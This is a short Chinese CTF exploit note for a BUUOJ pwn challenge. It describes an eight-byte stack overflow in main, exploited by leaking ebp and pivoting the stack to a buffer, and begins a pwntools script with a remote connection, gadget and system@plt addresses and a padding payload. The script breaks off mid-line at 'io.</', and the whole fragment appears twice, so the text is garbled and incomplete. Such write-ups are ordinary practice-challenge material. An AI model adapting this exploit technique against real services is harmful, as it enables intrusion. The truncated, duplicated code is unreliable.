main函数,存在八个字节溢出,栈迁移,第一次泄露ebp,得到栈上buf地址,迁移到buf即可。
from pwn import *
io=remote('node3.buuoj.cn',28060)
leave=0x8048562
sys_plt=0x8048400
pl1='a'*0x24+'bbbb'
io.</
main函数,存在八个字节溢出,栈迁移,第一次泄露ebp,得到栈上buf地址,迁移到buf即可。
from pwn import *
io=remote('node3.buuoj.cn',28060)
leave=0x8048562
sys_plt=0x8048400
pl1='a'*0x24+'bbbb'
io.</